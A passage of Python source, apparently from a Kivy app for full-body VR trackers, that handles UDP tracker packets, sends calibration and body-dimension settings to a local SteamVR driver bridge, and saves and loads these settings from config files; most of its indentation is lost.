if k in self.devices_broad_online.keys():
del self.devices_broad_online[k]
self.remove_stack_role(k)
broad_listen.close()
@mainthread
    def add_stack_list(self, mac, ip, battery, mode, accuracy, power, sleep, role):
        DeviceList_widget = DeviceList(mac, ip, battery, mode, accuracy, power, sleep, role)
self.root.ids.stack_list.add_widget(DeviceList_widget)
self.root.ids[mac + '_list'] = DeviceList_widget
@mainthread
    def edit_stack_list(self, mac, ip, battery, mode, accuracy, power, sleep, role):
self.root.ids[mac + '_list_mac'].text = str(mac)
self.root.ids[mac + '_list_ip'].text = str(ip)
self.root.ids[mac + '_list_battery'].text = str(battery)
self.root.ids[mac + '_list_percent'].text = str(battPercent(battery))
self.root.ids[mac + '_list_mode'].text = str(mode)
self.root.ids[mac + '_list_accuracy'].text = str(accuracy)
self.root.ids[mac + '_list_power'].text = str(power)
self.root.ids[mac + '_list_sleep'].text = str(sleep)
self.root.ids[mac + '_list_role'].text = str(role)
@mainthread
def remove_stack_list(self, k):
if k + '_list' in self.root.ids.keys():
self.root.ids.stack_list.remove_widget(self.root.ids[k + '_list'])
if k + '_list' in self.root.ids.keys():
del self.root.ids[k + '_list']
if k + '_list_mac' in self.root.ids.keys():
del self.root.ids[k + '_list_mac']
if k + '_list_ip' in self.root.ids.keys():
del self.root.ids[k + '_list_ip']
if k + '_list_battery' in self.root.ids.keys():
del self.root.ids[k + '_list_battery']
if k + '_list_percent' in self.root.ids.keys():
del self.root.ids[k + '_list_percent']
if k + '_list_mode' in self.root.ids.keys():
del self.root.ids[k + '_list_mode']
if k + '_list_accuracy' in self.root.ids.keys():
del self.root.ids[k + '_list_accuracy']
if k + '_list_power' in self.root.ids.keys():
del self.root.ids[k + '_list_power']
if k + '_list_sleep' in self.root.ids.keys():
del self.root.ids[k + '_list_sleep']
if k + '_list_role' in self.root.ids.keys():
del self.root.ids[k + '_list_role']
@mainthread
def headset_height_text(self, val):
self.root.ids.headset_height.text = val
@mainthread
def on_tracker_data(self, payload):
if payload[0] in range(1, 13) and self.current_page == 'Tracker Data':
tracker_type = 'tracker_{}'.format(payload[0])
_, ac, px, py, pz, qx, qy, qz, qw, _ = struct.unpack('<B?fffhhhhB', payload)
self.root.ids[tracker_type].ac.text = str(ac)
self.root.ids[tracker_type].px.text = '{:.2f}'.format(px)
self.root.ids[tracker_type].py.text = '{:.2f}'.format(py)
self.root.ids[tracker_type].pz.text = '{:.2f}'.format(pz)
self.root.ids[tracker_type].qx.text = '{:.2f}'.format(mapRange(qx))
self.root.ids[tracker_type].qy.text = '{:.2f}'.format(mapRange(qy))
self.root.ids[tracker_type].qz.text = '{:.2f}'.format(mapRange(qz))
self.root.ids[tracker_type].qw.text = '{:.2f}'.format(mapRange(qw))
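    # udp() is the main server loop on an ephemeral port (self.serverPort). It handles
    # height replies ('<Bf', code 32), driver heartbeats ('<BH', codes 87/97) that
    # trigger set_driver_settings()/set_init_settings(), per-tracker pose packets
    # ('<B?fffhhhhB') and device status reports, and marks SteamVR offline after 5 s
    # without driver traffic.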
def udp(self):
self.sock_listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock_listen.bind(('0.0.0.0', 0))
self.sock_listen.settimeout(0.5)
self.serverPort = self.sock_listen.getsockname()[1]
t_tx_driver = time.perf_counter()
while self.thread_run:
try:
payload, addr = self.sock_listen.recvfrom(32)
if self.check_payload(payload):
payload = self.unwrap_payload(payload)
if len(payload) == struct.calcsize('<Bf'):
if payload[0] == 32:
height = struct.unpack('<f', payload[1:])[0]
self.headset_height_text('{:.2f} m'.format(height))
elif len(payload) == struct.calcsize('<BH'):
if payload[0] == 87:
self.steam_status_text('SteamVR online')
_, self.bridgePort = struct.unpack('<BH', payload)
self.set_driver_settings()
t_tx_driver = time.perf_counter()
elif payload[0] == 97:
self.steam_status_text('SteamVR online')
_, self.bridgePort = struct.unpack('<BH', payload)
self.set_init_settings()
t_tx_driver = time.perf_counter()
elif len(payload) == struct.calcsize('<B?fffhhhhB'):
self.on_tracker_data(payload)
elif len(payload) == struct.calcsize('<BBBBBBBBfBBBBBB?'):
mac = binascii.hexlify(payload[2:8]).decode()
ip = addr[0]
battery, mode, mode_ext, accuracy, accuracy_ext, power, sleep, extend = struct.unpack('<fBBBBBB?', payload[8:])
battery = '{:.2f}'.format(battery)
power = '{:.1f}'.format(power/4.0)
sleep = str(bool(sleep))
roles_reply = [0, 0]
modes_reply = [0, 0]
if extend:
for_length = 2
roles = [ROLE[payload[0]], ROLE[payload[1]]]
modes = [MODE_SHORT[mode], MODE_SHORT[mode_ext]]
accuracies = [ACCURACY[accuracy], ACCURACY[accuracy_ext]]
macs = [mac + '_main', mac + '_extend']
else:
for_length = 1
roles = [ROLE[payload[0]]]
modes = [MODE_SHORT[mode]]
accuracies = [ACCURACY[accuracy]]
macs = [mac + '_main']
for i in range(for_length):
role = roles[i]
mode = modes[i]
accuracy = accuracies[i]
mac = macs[i]
self.devices_online[mac] = time.perf_counter()
self.devices_broad_online[mac] = time.perf_counter()
if mac + '_list' not in self.root.ids.keys():
self.add_stack_list(mac, ip, battery, mode, accuracy, power, sleep, role)
else:
self.edit_stack_list(mac, ip, battery, mode, accuracy, power, sleep, role)
roles_reply[i] = ROLE.index(self.devices_list[mac]['role'])
modes_reply[i] = MODE.index(self.devices_list[mac]['mode'])
if self.devices_list[macs[0]]['connect']:
reply = struct.pack('<BBBBBBBHH', 200, roles_reply[0], roles_reply[1], modes_reply[0], modes_reply[1],
int(float(self.devices_list[mac]['power']) * 4), self.devices_list[mac]['sleep'],
self.serverPort, self.bridgePort)
self.sock_listen.sendto(self.wrap_payload(reply), (ip, self.broadPort))
except:
pass
if time.perf_counter() - t_tx_driver >= 5:
self.steam_status_text('SteamVR offline')
self.bridgePort = 0
to_del = []
for k, v in self.devices_online.items():
if time.perf_counter() - v >= 5:
to_del.append(k)
for k in to_del:
if k in self.devices_online.keys():
del self.devices_online[k]
self.remove_stack_list(k)
self.sock_listen.close()
def onTabChange(self, tab):
self.current_page = tab.text
if tab.text == 'Tracker Data':
if self.bridgePort != 0:
payload = struct.pack('<B', 171)
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
else:
if self.bridgePort != 0:
payload = struct.pack('<B', 172)
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
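    # set_driver_settings() packs the UI state into two payloads for the local driver
    # bridge: a 209-byte packet with twelve 3-float mounting rotations (degrees from
    # the UI converted to radians) at offsets 0-143, sixteen floats of body/sensor
    # dimensions at 144-207 and an override_feet flag at 208; followed by a 104-byte
    # packet of thirteen (slider1, slider2) position-offset pairs.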
def set_driver_settings(self):
T_lfoot_drv = [math.radians(float(self.root.ids.lfoot_t.tx.text)),
math.radians(float(self.root.ids.lfoot_t.ty.text)),
math.radians(float(self.root.ids.lfoot_t.tz.text))]
T_rfoot_drv = [math.radians(float(self.root.ids.rfoot_t.tx.text)),
math.radians(float(self.root.ids.rfoot_t.ty.text)),
math.radians(float(self.root.ids.rfoot_t.tz.text))]
T_lshin_drv = [math.radians(float(self.root.ids.lshin_t.tx.text)),
math.radians(float(self.root.ids.lshin_t.ty.text)),
math.radians(float(self.root.ids.lshin_t.tz.text))]
T_rshin_drv = [math.radians(float(self.root.ids.rshin_t.tx.text)),
math.radians(float(self.root.ids.rshin_t.ty.text)),
math.radians(float(self.root.ids.rshin_t.tz.text))]
T_lthigh_drv = [math.radians(float(self.root.ids.lthigh_t.tx.text)),
math.radians(float(self.root.ids.lthigh_t.ty.text)),
math.radians(float(self.root.ids.lthigh_t.tz.text))]
T_rthigh_drv = [math.radians(float(self.root.ids.rthigh_t.tx.text)),
math.radians(float(self.root.ids.rthigh_t.ty.text)),
math.radians(float(self.root.ids.rthigh_t.tz.text))]
T_waist_drv = [math.radians(float(self.root.ids.waist_t.tx.text)),
math.radians(float(self.root.ids.waist_t.ty.text)),
math.radians(float(self.root.ids.waist_t.tz.text))]
T_chest_drv = [math.radians(float(self.root.ids.chest_t.tx.text)),
math.radians(float(self.root.ids.chest_t.ty.text)),
math.radians(float(self.root.ids.chest_t.tz.text))]
T_lshoulder_drv = [math.radians(float(self.root.ids.lshoulder_t.tx.text)),
math.radians(float(self.root.ids.lshoulder_t.ty.text)),
math.radians(float(self.root.ids.lshoulder_t.tz.text))]
T_rshoulder_drv = [math.radians(float(self.root.ids.rshoulder_t.tx.text)),
math.radians(float(self.root.ids.rshoulder_t.ty.text)),
math.radians(float(self.root.ids.rshoulder_t.tz.text))]
T_lupperarm_drv = [math.radians(float(self.root.ids.lupperarm_t.tx.text)),
math.radians(float(self.root.ids.lupperarm_t.ty.text)),
math.radians(float(self.root.ids.lupperarm_t.tz.text))]
T_rupperarm_drv = [math.radians(float(self.root.ids.rupperarm_t.tx.text)),
math.radians(float(self.root.ids.rupperarm_t.ty.text)),
math.radians(float(self.root.ids.rupperarm_t.tz.text))]
shin_h = float(self.root.ids.shin_h.slider.value * self.root.ids.vscale.slider.value)
thigh_h = float(self.root.ids.thigh_h.slider.value * self.root.ids.vscale.slider.value)
lback_h = float(self.root.ids.lback_h.slider.value * self.root.ids.vscale.slider.value)
uback_h = float(self.root.ids.uback_h.slider.value * self.root.ids.vscale.slider.value)
head_h = float(self.root.ids.head_h.slider.value * self.root.ids.vscale.slider.value)
shoulder_h = float(self.root.ids.shoulder_h.slider.value * self.root.ids.vscale.slider.value)
hip_width_h = float(self.root.ids.hip_width_h.slider.value * self.root.ids.hscale.slider.value)
shoulder_width_h = float(self.root.ids.shoulder_width_h.slider.value * self.root.ids.hscale.slider.value)
foot_sensor_h = float(self.root.ids.foot_sensor_h.slider.value)
shin_sensor_h = float(self.root.ids.shin_sensor_h.slider.value)
thigh_sensor_h = float(self.root.ids.thigh_sensor_h.slider.value)
waist_sensor_h = float(self.root.ids.waist_sensor_h.slider.value)
chest_sensor_h = float(self.root.ids.chest_sensor_h.slider.value)
shoulder_sensor_h = float(self.root.ids.shoulder_sensor_h.slider.value)
upperarm_sensor_h = float(self.root.ids.upperarm_sensor_h.slider.value)
floor_offset = float(self.root.ids.floor_offset.slider.value)
override_feet = self.root.ids.override_feet_en_check.switch.active
payload = bytearray(209)
struct.pack_into('<3f', payload, 0, *T_lfoot_drv)
struct.pack_into('<3f', payload, 12, *T_rfoot_drv)
struct.pack_into('<3f', payload, 24, *T_lshin_drv)
struct.pack_into('<3f', payload, 36, *T_rshin_drv)
struct.pack_into('<3f', payload, 48, *T_lthigh_drv)
struct.pack_into('<3f', payload, 60, *T_rthigh_drv)
struct.pack_into('<3f', payload, 72, *T_waist_drv)
struct.pack_into('<3f', payload, 84, *T_chest_drv)
struct.pack_into('<3f', payload, 96, *T_lshoulder_drv)
struct.pack_into('<3f', payload, 108, *T_rshoulder_drv)
struct.pack_into('<3f', payload, 120, *T_lupperarm_drv)
struct.pack_into('<3f', payload, 132, *T_rupperarm_drv)
struct.pack_into('<16f', payload, 144,
shin_h,
thigh_h,
lback_h,
uback_h,
head_h,
shoulder_h,
hip_width_h,
shoulder_width_h,
foot_sensor_h,
shin_sensor_h,
thigh_sensor_h,
waist_sensor_h,
chest_sensor_h,
shoulder_sensor_h,
upperarm_sensor_h,
floor_offset)
struct.pack_into('<?', payload, 208, override_feet)
if not self.focused and self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
lfoot_1 = float(self.root.ids.lfoot_o.slider1.value)
lfoot_2 = float(self.root.ids.lfoot_o.slider2.value)
rfoot_1 = float(self.root.ids.rfoot_o.slider1.value)
rfoot_2 = float(self.root.ids.rfoot_o.slider2.value)
lshin_1 = float(self.root.ids.lshin_o.slider1.value)
lshin_2 = float(self.root.ids.lshin_o.slider2.value)
rshin_1 = float(self.root.ids.rshin_o.slider1.value)
rshin_2 = float(self.root.ids.rshin_o.slider2.value)
lthigh_1 = float(self.root.ids.lthigh_o.slider1.value)
lthigh_2 = float(self.root.ids.lthigh_o.slider2.value)
rthigh_1 = float(self.root.ids.rthigh_o.slider1.value)
rthigh_2 = float(self.root.ids.rthigh_o.slider2.value)
waist_1 = float(self.root.ids.waist_o.slider1.value)
waist_2 = float(self.root.ids.waist_o.slider2.value)
chest_1 = float(self.root.ids.chest_o.slider1.value)
chest_2 = float(self.root.ids.chest_o.slider2.value)
lshoulder_1 = float(self.root.ids.lshoulder_o.slider1.value)
lshoulder_2 = float(self.root.ids.lshoulder_o.slider2.value)
rshoulder_1 = float(self.root.ids.rshoulder_o.slider1.value)
rshoulder_2 = float(self.root.ids.rshoulder_o.slider2.value)
lupperarm_1 = float(self.root.ids.lupperarm_o.slider1.value)
lupperarm_2 = float(self.root.ids.lupperarm_o.slider2.value)
rupperarm_1 = float(self.root.ids.rupperarm_o.slider1.value)
rupperarm_2 = float(self.root.ids.rupperarm_o.slider2.value)
head_1 = float(self.root.ids.head_o.slider1.value)
head_2 = float(self.root.ids.head_o.slider2.value)
payload = bytearray(104)
struct.pack_into('<2f', payload, 0, lfoot_1, lfoot_2)
struct.pack_into('<2f', payload, 8, rfoot_1, rfoot_2)
struct.pack_into('<2f', payload, 16, lshin_1, lshin_2)
struct.pack_into('<2f', payload, 24, rshin_1, rshin_2)
struct.pack_into('<2f', payload, 32, lthigh_1, lthigh_2)
struct.pack_into('<2f', payload, 40, rthigh_1, rthigh_2)
struct.pack_into('<2f', payload, 48, waist_1, waist_2)
struct.pack_into('<2f', payload, 56, chest_1, chest_2)
struct.pack_into('<2f', payload, 64, lshoulder_1, lshoulder_2)
struct.pack_into('<2f', payload, 72, rshoulder_1, rshoulder_2)
struct.pack_into('<2f', payload, 80, lupperarm_1, lupperarm_2)
struct.pack_into('<2f', payload, 88, rupperarm_1, rupperarm_2)
struct.pack_into('<2f', payload, 96, head_1, head_2)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
def set_init_settings(self):
feet_enable = self.root.ids.feet_en_check.switch.active
shin_enable = self.root.ids.shin_en_check.switch.active
thigh_enable = self.root.ids.thigh_en_check.switch.active
waist_enable = self.root.ids.waist_en_check.switch.active
chest_enable = self.root.ids.chest_en_check.switch.active
shoulder_enable = self.root.ids.shoulder_en_check.switch.active
upperarm_enable = self.root.ids.upperarm_en_check.switch.active
payload = struct.pack('<7B',
feet_enable,
shin_enable,
thigh_enable,
waist_enable,
chest_enable,
shoulder_enable,
upperarm_enable)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
@mainthread
def save(self, file):
config = ConfigParser()
config.add_section('version')
config.set('version', 'version', VERSION)
config.add_section('lfoot')
config.set('lfoot', 'x', self.root.ids.lfoot_t.tx.text)
config.set('lfoot', 'y', self.root.ids.lfoot_t.ty.text)
config.set('lfoot', 'z', self.root.ids.lfoot_t.tz.text)
config.add_section('rfoot')
config.set('rfoot', 'x', self.root.ids.rfoot_t.tx.text)
config.set('rfoot', 'y', self.root.ids.rfoot_t.ty.text)
config.set('rfoot', 'z', self.root.ids.rfoot_t.tz.text)
config.add_section('lshin')
config.set('lshin', 'x', self.root.ids.lshin_t.tx.text)
config.set('lshin', 'y', self.root.ids.lshin_t.ty.text)
config.set('lshin', 'z', self.root.ids.lshin_t.tz.text)
config.add_section('rshin')
config.set('rshin', 'x', self.root.ids.rshin_t.tx.text)
config.set('rshin', 'y', self.root.ids.rshin_t.ty.text)
config.set('rshin', 'z', self.root.ids.rshin_t.tz.text)
config.add_section('lthigh')
config.set('lthigh', 'x', self.root.ids.lthigh_t.tx.text)
config.set('lthigh', 'y', self.root.ids.lthigh_t.ty.text)
config.set('lthigh', 'z', self.root.ids.lthigh_t.tz.text)
config.add_section('rthigh')
config.set('rthigh', 'x', self.root.ids.rthigh_t.tx.text)
config.set('rthigh', 'y', self.root.ids.rthigh_t.ty.text)
config.set('rthigh', 'z', self.root.ids.rthigh_t.tz.text)
config.add_section('waist')
config.set('waist', 'x', self.root.ids.waist_t.tx.text)
config.set('waist', 'y', self.root.ids.waist_t.ty.text)
config.set('waist', 'z', self.root.ids.waist_t.tz.text)
config.add_section('chest')
config.set('chest', 'x', self.root.ids.chest_t.tx.text)
config.set('chest', 'y', self.root.ids.chest_t.ty.text)
config.set('chest', 'z', self.root.ids.chest_t.tz.text)
config.add_section('lshoulder')
config.set('lshoulder', 'x', self.root.ids.lshoulder_t.tx.text)
config.set('lshoulder', 'y', self.root.ids.lshoulder_t.ty.text)
config.set('lshoulder', 'z', self.root.ids.lshoulder_t.tz.text)
config.add_section('rshoulder')
config.set('rshoulder', 'x', self.root.ids.rshoulder_t.tx.text)
config.set('rshoulder', 'y', self.root.ids.rshoulder_t.ty.text)
config.set('rshoulder', 'z', self.root.ids.rshoulder_t.tz.text)
config.add_section('lupperarm')
config.set('lupperarm', 'x', self.root.ids.lupperarm_t.tx.text)
config.set('lupperarm', 'y', self.root.ids.lupperarm_t.ty.text)
config.set('lupperarm', 'z', self.root.ids.lupperarm_t.tz.text)
config.add_section('rupperarm')
config.set('rupperarm', 'x', self.root.ids.rupperarm_t.tx.text)
config.set('rupperarm', 'y', self.root.ids.rupperarm_t.ty.text)
config.set('rupperarm', 'z', self.root.ids.rupperarm_t.tz.text)
config.add_section('parameter')
config.set('parameter', 'shin_h', str(self.root.ids.shin_h.slider.value))
config.set('parameter', 'thigh_h', str(self.root.ids.thigh_h.slider.value))
config.set('parameter', 'lback_h', str(self.root.ids.lback_h.slider.value))
config.set('parameter', 'uback_h', str(self.root.ids.uback_h.slider.value))
config.set('parameter', 'head_h', str(self.root.ids.head_h.slider.value))
config.set('parameter', 'shoulder_h', str(self.root.ids.shoulder_h.slider.value))
config.set('parameter', 'hip_width_h', str(self.root.ids.hip_width_h.slider.value))
config.set('parameter', 'shoulder_width_h', str(self.root.ids.shoulder_width_h.slider.value))
config.set('parameter', 'vscale', str(self.root.ids.vscale.slider.value))
config.set('parameter', 'hscale', str(self.root.ids.hscale.slider.value))
config.set('parameter', 'foot_sensor_h', str(self.root.ids.foot_sensor_h.slider.value))
config.set('parameter', 'shin_sensor_h', str(self.root.ids.shin_sensor_h.slider.value))
config.set('parameter', 'thigh_sensor_h', str(self.root.ids.thigh_sensor_h.slider.value))
config.set('parameter', 'waist_sensor_h', str(self.root.ids.waist_sensor_h.slider.value))
config.set('parameter', 'chest_sensor_h', str(self.root.ids.chest_sensor_h.slider.value))
config.set('parameter', 'shoulder_sensor_h', str(self.root.ids.shoulder_sensor_h.slider.value))
config.set('parameter', 'upperarm_sensor_h', str(self.root.ids.upperarm_sensor_h.slider.value))
config.set('parameter', 'floor_offset', str(self.root.ids.floor_offset.slider.value))
config.set('parameter', 'override_feet_en_check', str(int(self.root.ids.override_feet_en_check.switch.active)))
config.add_section('activation')
config.set('activation', 'feet_en_check', str(int(self.root.ids.feet_en_check.switch.active)))
config.set('activation', 'shin_en_check', str(int(self.root.ids.shin_en_check.switch.active)))
config.set('activation', 'thigh_en_check', str(int(self.root.ids.thigh_en_check.switch.active)))
config.set('activation', 'waist_en_check', str(int(self.root.ids.waist_en_check.switch.active)))
config.set('activation', 'chest_en_check', str(int(self.root.ids.chest_en_check.switch.active)))
config.set('activation', 'shoulder_en_check', str(int(self.root.ids.shoulder_en_check.switch.active)))
config.set('activation', 'upperarm_en_check', str(int(self.root.ids.upperarm_en_check.switch.active)))
config.add_section('offset')
config.set('offset', 'lfoot_pos_1', str(self.root.ids.lfoot_o.slider1.value))
config.set('offset', 'lfoot_pos_2', str(self.root.ids.lfoot_o.slider2.value))
config.set('offset', 'rfoot_pos_1', str(self.root.ids.rfoot_o.slider1.value))
config.set('offset', 'rfoot_pos_2', str(self.root.ids.rfoot_o.slider2.value))
config.set('offset', 'lshin_pos_1', str(self.root.ids.lshin_o.slider1.value))
config.set('offset', 'lshin_pos_2', str(self.root.ids.lshin_o.slider2.value))
config.set('offset', 'rshin_pos_1', str(self.root.ids.rshin_o.slider1.value))
config.set('offset', 'rshin_pos_2', str(self.root.ids.rshin_o.slider2.value))
config.set('offset', 'lthigh_pos_1', str(self.root.ids.lthigh_o.slider1.value))
config.set('offset', 'lthigh_pos_2', str(self.root.ids.lthigh_o.slider2.value))
config.set('offset', 'rthigh_pos_1', str(self.root.ids.rthigh_o.slider1.value))
config.set('offset', 'rthigh_pos_2', str(self.root.ids.rthigh_o.slider2.value))
config.set('offset', 'waist_pos_1', str(self.root.ids.waist_o.slider1.value))
config.set('offset', 'waist_pos_2', str(self.root.ids.waist_o.slider2.value))
config.set('offset', 'chest_pos_1', str(self.root.ids.chest_o.slider1.value))
config.set('offset', 'chest_pos_2', str(self.root.ids.chest_o.slider2.value))
config.set('offset', 'lshoulder_pos_1', str(self.root.ids.lshoulder_o.slider1.value))
config.set('offset', 'lshoulder_pos_2', str(self.root.ids.lshoulder_o.slider2.value))
config.set('offset', 'rshoulder_pos_1', str(self.root.ids.rshoulder_o.slider1.value))
config.set('offset', 'rshoulder_pos_2', str(self.root.ids.rshoulder_o.slider2.value))
config.set('offset', 'lupperarm_pos_1', str(self.root.ids.lupperarm_o.slider1.value))
config.set('offset', 'lupperarm_pos_2', str(self.root.ids.lupperarm_o.slider2.value))
config.set('offset', 'rupperarm_pos_1', str(self.root.ids.rupperarm_o.slider1.value))
config.set('offset', 'rupperarm_pos_2', str(self.root.ids.rupperarm_o.slider2.value))
config.set('offset', 'head_pos_1', str(self.root.ids.head_o.slider1.value))
config.set('offset', 'head_pos_2', str(self.root.ids.head_o.slider2.value))
config.add_section('devices')
for k, v in self.devices_list.items():
config.set('devices', k, str(v['role']))
config.add_section('devices_mode')
for k, v in self.devices_list.items():
config.set('devices_mode', k, str(v['mode']))
config.add_section('devices_connect')
for k, v in self.devices_list.items():
config.set('devices_connect', k, str(int(v['connect'])))
config.add_section('devices_power')
for k, v in self.devices_list.items():
config.set('devices_power', k, str(v['power']))
config.add_section('devices_sleep')
for k, v in self.devices_list.items():
config.set('devices_sleep', k, str(int(v['sleep'])))
sections = ['lfoot', 'rfoot', 'lshin', 'rshin', 'lthigh', 'rthigh',
'waist', 'chest', 'lshoulder', 'rshoulder', 'lupperarm', 'rupperarm']
for section in sections:
for item in config.items(section):
if item[1] == '':
config.set(section, item[0], '0')
with open(file, 'w') as f:
config.write(f)
filename = file.split('\\')[-1]
self.root.ids.save_load_text.text = '{} saved'.format(filename)
self.update_settings(file)
@mainthread
def load(self, file):
if os.path.isfile(file):
try:
config = ConfigParser()
config.read(file)
if config.get('version', 'version') != VERSION:
raise ValueError('settings file version mismatch')
self.root.ids.lfoot_t.tx.text = config.get('lfoot', 'x')
self.root.ids.lfoot_t.ty.text = config.get('lfoot', 'y')
self.root.ids.lfoot_t.tz.text = config.get('lfoot', 'z')
self.root.ids.rfoot_t.tx.text = config.get('rfoot', 'x')
self.root.ids.rfoot_t.ty.text = config.get('rfoot', 'y')
self.root.ids.rfoot_t.tz.text = config.get('rfoot', 'z')
self.root.ids.lshin_t.tx.text = config.get('lshin', 'x')
self.root.ids.lshin_t.ty.text = config.get('lshin', 'y')
self.root.ids.lshin_t.tz.text = config.get('lshin', 'z')
self.root.ids.rshin_t.tx.text = config.get('rshin', 'x')
self.root.ids.rshin_t.ty.text = config.get('rshin', 'y')
self.root.ids.rshin_t.tz.text = config.get('rshin', 'z')
self.root.ids.lthigh_t.tx.text = config.get('lthigh', 'x')
self.root.ids.lthigh_t.ty.text = config.get('lthigh', 'y')
self.root.ids.lthigh_t.tz.text = config.get('lthigh', 'z')
self.root.ids.rthigh_t.tx.text = config.get('rthigh', 'x')
self.root.ids.rthigh_t.ty.text = config.get('rthigh', 'y')
self.root.ids.rthigh_t.tz.text = config.get('rthigh', 'z')
self.root.ids.waist_t.tx.text = config.get('waist', 'x')
self.root.ids.waist_t.ty.text = config.get('waist', 'y')
self.root.ids.waist_t.tz.text = config.get('waist', 'z')
self.root.ids.chest_t.tx.text = config.get('chest', 'x')
self.root.ids.chest_t.ty.text = config.get('chest', 'y')
self.root.ids.chest_t.tz.text = config.get('chest', 'z')
self.root.ids.lshoulder_t.tx.text = config.get('lshoulder', 'x')
self.root.ids.lshoulder_t.ty.text = config.get('lshoulder', 'y')
self.root.ids.lshoulder_t.tz.text = config.get('lshoulder', 'z')
self.root.ids.rshoulder_t.tx.text = config.get('rshoulder', 'x')
self.root.ids.rshoulder_t.ty.text = config.get('rshoulder', 'y')
self.root.ids.rshoulder_t.tz.text = config.get('rshoulder', 'z')
self.root.ids.lupperarm_t.tx.text = config.get('lupperarm', 'x')
self.root.ids.lupperarm_t.ty.text = config.get('lupperarm', 'y')
self.root.ids.lupperarm_t.tz.text = config.get('lupperarm', 'z')
self.root.ids.rupperarm_t.tx.text = config.get('rupperarm', 'x')
self.root.ids.rupperarm_t.ty.text = config.get('rupperarm', 'y')
self.root.ids.rupperarm_t.tz.text = config.get('rupperarm', 'z')
self.root.ids.shin_h.slider.value = float(config.get('parameter', 'shin_h'))
self.root.ids.thigh_h.slider.value = float(config.get('parameter', 'thigh_h'))
self.root.ids.lback_h.slider.value = float(config.get('parameter', 'lback_h'))
self.root.ids.uback_h.slider.value = float(config.get('parameter', 'uback_h'))
self.root.ids.head_h.slider.value = float(config.get('parameter', 'head_h'))
self.root.ids.shoulder_h.slider.value = float(config.get('parameter', 'shoulder_h'))
self.root.ids.hip_width_h.slider.value = float(config.get('parameter', 'hip_width_h'))
self.root.ids.shoulder_width_h.slider.value = float(config.get('parameter', 'shoulder_width_h'))
self.root.ids.vscale.slider.value = float(config.get('parameter', 'vscale'))
self.root.ids.hscale.slider.value = float(config.get('parameter', 'hscale'))
self.root.ids.foot_sensor_h.slider.value = float(config.get('parameter', 'foot_sensor_h'))
self.root.ids.shin_sensor_h.slider.value = float(config.get('parameter', 'shin_sensor_h'))
self.root.ids.thigh_sensor_h.slider.value = float(config.get('parameter', 'thigh_sensor_h'))
self.root.ids.waist_sensor_h.slider.value = float(config.get('parameter', 'waist_sensor_h'))
self.root.ids.chest_sensor_h.slider.value = float(config.get('parameter', 'chest_sensor_h'))
self.root.ids.shoulder_sensor_h.slider.value = float(config.get('parameter', 'shoulder_sensor_h'))
self.root.ids.upperarm_sensor_h.slider.value = float(config.get('parameter', 'upperarm_sensor_h'))
self.root.ids.floor_offset.slider.value = float(config.get('parameter', 'floor_offset'))
self.root.ids.override_feet_en_check.switch.active = int(config.get('parameter', 'override_feet_en_check'))
self.root.ids.feet_en_check.switch.active = int(config.get('activation', 'feet_en_check'))
self.root.ids.shin_en_check.switch.active = int(config.get('activation', 'shin_en_check'))
self.root.ids.thigh_en_check.switch.active = int(config.get('activation', 'thigh_en_check'))
self.root.ids.waist_en_check.switch.active = int(config.get('activation', 'waist_en_check'))
self.root.ids.chest_en_check.switch.active = int(config.get('activation', 'chest_en_check'))
self.root.ids.shoulder_en_check.switch.active = int(config.get('activation', 'shoulder_en_check'))
self.root.ids.upperarm_en_check.switch.active = int(config.get('activation', 'upperarm_en_check'))
self.root.ids.lfoot_o.slider1.value = float(config.get('offset', 'lfoot_pos_1'))
self.root.ids.lfoot_o.slider2.value = float(config.get('offset', 'lfoot_pos_2'))
self.root.ids.rfoot_o.slider1.value = float(config.get('offset', 'rfoot_pos_1'))
self.root.ids.rfoot_o.slider2.value = float(config.get('offset', 'rfoot_pos_2'))
self.root.ids.lshin_o.slider1.value = float(config.get('offset', 'lshin_pos_1'))
self.root.ids.lshin_o.slider2.value = float(config.get('offset', 'lshin_pos_2'))
self.root.ids.rshin_o.slider1.value = float(config.get('offset', 'rshin_pos_1'))
self.root.ids.rshin_o.slider2.value = float(config.get('offset', 'rshin_pos_2'))
self.root.ids.lthigh_o.slider1.value = float(config.get('offset', 'lthigh_pos_1'))
self.root.ids.lthigh_o.slider2.value = float(config.get('offset', 'lthigh_pos_2'))
self.root.ids.rthigh_o.slider1.value = float(config.get('offset', 'rthigh_pos_1'))
self.root.ids.rthigh_o.slider2.value = float(config.get('offset', 'rthigh_pos_2'))
self.root.ids.waist_o.slider1.value = float(config.get('offset', 'waist_pos_1'))
self.root.ids.waist_o.slider2.value = float(config.get('offset', 'waist_pos_2'))
self.root.ids.chest_o.slider1.value = float(config.get('offset', 'chest_pos_1'))
self.root.ids.chest_o.slider2.value = float(config.get('offset', 'chest_pos_2'))
self.root.ids.lshoulder_o.slider1.value = float(config.get('offset', 'lshoulder_pos_1'))
self.root.ids.lshoulder_o.slider2.value = float(config.get('offset', 'lshoulder_pos_2'))
self.root.ids.rshoulder_o.slider1.value = float(config.get('offset', 'rshoulder_pos_1'))
self.root.ids.rshoulder_o.slider2.value = float(config.get('offset', 'rshoulder_pos_2'))
self.root.ids.lupperarm_o.slider1.value = float(config.get('offset', 'lupperarm_pos_1'))
self.root.ids.lupperarm_o.slider2.value = float(config.get('offset', 'lupperarm_pos_2'))
self.root.ids.rupperarm_o.slider1.value = float(config.get('offset', 'rupperarm_pos_1'))
self.root.ids.rupperarm_o.slider2.value = float(config.get('offset', 'rupperarm_pos_2'))
self.root.ids.head_o.slider1.value = float(config.get('offset', 'head_pos_1'))
self.root.ids.head_o.slider2.value = float(config.get('offset', 'head_pos_2'))
for k in config.items('devices'):
self.devices_list[k[0]] = {}
self.devices_list[k[0]]['role'] = k[1]
if k[0] + '_role_role' in self.root.ids.keys():
self.root.ids[k[0] + '_role_role'].text = k[1]
for k in config.items('devices_mode'):
self.devices_list[k[0]]['mode'] = k[1]
if k[0] + '_role_mode' in self.root.ids.keys():
self.root.ids[k[0] + '_role_mode'].text = k[1]
for k in config.items('devices_connect'):
self.devices_list[k[0]]['connect'] = int(k[1])
if k[0] + '_role_connect' in self.root.ids.keys():
self.root.ids[k[0] + '_role_connect'].active = bool(int(k[1]))
